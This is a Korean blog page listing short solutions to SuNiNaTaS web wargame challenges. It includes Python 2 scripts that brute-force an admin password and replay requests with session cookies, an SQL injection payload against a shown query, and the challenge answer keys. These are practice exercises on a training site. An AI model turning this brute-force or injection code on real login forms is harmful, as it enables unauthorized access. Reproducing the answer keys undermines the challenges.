'Wargame/SuNiNaTaS' 카테고리의 글 목록 (2 Page)

Wargame/SuNiNaTaS

SuNiNaTaS web08번 2017.03.07
SuNiNaTaS web07번 2017.03.07
SuNiNaTaS web06번 2017.03.07
SuNiNaTaS web05번 2017.03.07
SuNiNaTaS web04번 2017.03.07
SuNiNaTaS web03번 2017.03.07
SuNiNaTaS web02번 2017.03.07
SuNiNaTaS web01번 2017.03.07

SuNiNaTaS web08번

2017. 3. 7. 17:00

import urllib, urllib2

url = "http://suninatas.com/Part_one/web08/web08.asp"

#User_Agent = "SuNiNaTaS"
i = ""
for i in range(7600,10000):
    dat = {'id': 'admin', 'pw': i}
    dat = urllib.urlencode(dat)
    print dat
    header = {'Cookie': "ASPSESSIONIDCCRBCADD=FMCHFPOCKMPIDIOPDCBFBLCE"}

    req = urllib2.Request(url, dat, headers=header)
#req.add_header=('User-Agent', User_Agent)

    res = urllib2.urlopen(req).read()
    if "Password Incorrect!" not in res:
        print "[*]Find Auth Key!" + str(i)
        break
        sys.exit(1)

'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS web23번 (0)	2017.03.10
SuNiNaTaS web22번 (0)	2017.03.07
SuNiNaTaS web07번 (0)	2017.03.07
SuNiNaTaS web06번 (0)	2017.03.07
SuNiNaTaS web05번 (0)	2017.03.07

SuNiNaTaS web07번

2017. 3. 7. 17:00

import urllib, urllib2

url = "http://suninatas.com/Part_one/web07/web07.asp"
url2 = "http://suninatas.com/Part_one/web07/web07_1.asp"

header = {'Cookie': "ASPSESSIONIDCCRBCADD=FMCHFPOCKMPIDIOPDCBFBLCE"}

req = urllib2.Request(url, headers=header)

res = urllib2.urlopen(req).read()
req1 = urllib2.Request(url2, headers=header)
res = urllib2.urlopen(req1).read()
print res

'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS web22번 (0)	2017.03.07
SuNiNaTaS web08번 (0)	2017.03.07
SuNiNaTaS web06번 (0)	2017.03.07
SuNiNaTaS web05번 (0)	2017.03.07
SuNiNaTaS web04번 (0)	2017.03.07

SuNiNaTaS web06번

2017. 3. 7. 17:00

README 글 비밀번호 쿼리

"select szPwd from T_Web13 where nIdx = '3' and szPwd = '"&pwd&"'"

sqli -> ' or '1' like '1

authkey = suninatastopofworld!

md5(authkey) = 65038b0559e459420aa2d23093d01e4a

쿠키에 입력

Rome's First Emperor를 구글링

auth key = Augustus

'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS web08번 (0)	2017.03.07
SuNiNaTaS web07번 (0)	2017.03.07
SuNiNaTaS web05번 (0)	2017.03.07
SuNiNaTaS web04번 (0)	2017.03.07
SuNiNaTaS web03번 (0)	2017.03.07

SuNiNaTaS web05번

2017. 3. 7. 17:00

eval 함수 -> alert 변경

'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS web07번 (0)	2017.03.07
SuNiNaTaS web06번 (0)	2017.03.07
SuNiNaTaS web04번 (0)	2017.03.07
SuNiNaTaS web03번 (0)	2017.03.07
SuNiNaTaS web02번 (0)	2017.03.07

SuNiNaTaS web04번

2017. 3. 7. 17:00

import urllib, urllib2, sys

url = "http://suninatas.com/Part_one/web04/web04_ck.asp"
url2 = "http://suninatas.com/Part_one/web04/web04.asp"
dat = {'total': '49'}
dat = urllib.urlencode(dat)
for i in range(50):
    req = urllib2.Request(url, dat,headers={'Host':'suninatas.com',
                                        'User-Agent': 'SuNiNaTaS',
                                        'Cookie': 'ASPSESSIONIDCCRBCADD=BBDHFPOCLPILDJPDNCKOAPKN'})
    res = urllib2.urlopen(req).read()
    req = urllib2.Request(url2, dat, headers={'Host':'suninatas.com',
                                        'User-Agent': 'SuNiNaTaS',
                                        'Cookie': 'ASPSESSIONIDCCRBCADD=BBDHFPOCLPILDJPDNCKOAPKN'})
    res = urllib2.urlopen(req).read()
    if ">?????"  not in res:
        print "[*]Find Key : "
        print res
        sys.exit(1)

'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS web06번 (0)	2017.03.07
SuNiNaTaS web05번 (0)	2017.03.07
SuNiNaTaS web03번 (0)	2017.03.07
SuNiNaTaS web02번 (0)	2017.03.07
SuNiNaTaS web01번 (0)	2017.03.07

SuNiNaTaS web03번

2017. 3. 7. 16:59

SuNiNaTaS web02번

2017. 3. 7. 16:59

SuNiNaTaS web01번

2017. 3. 7. 16:58

PREV 1 2 NEXT

SSo

Wargame/SuNiNaTaS

SuNiNaTaS web08번

'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS web07번

'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS web06번

'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS web05번

'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS web04번

'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS web03번

SuNiNaTaS web02번

SuNiNaTaS web01번

+ Recent posts

티스토리툴바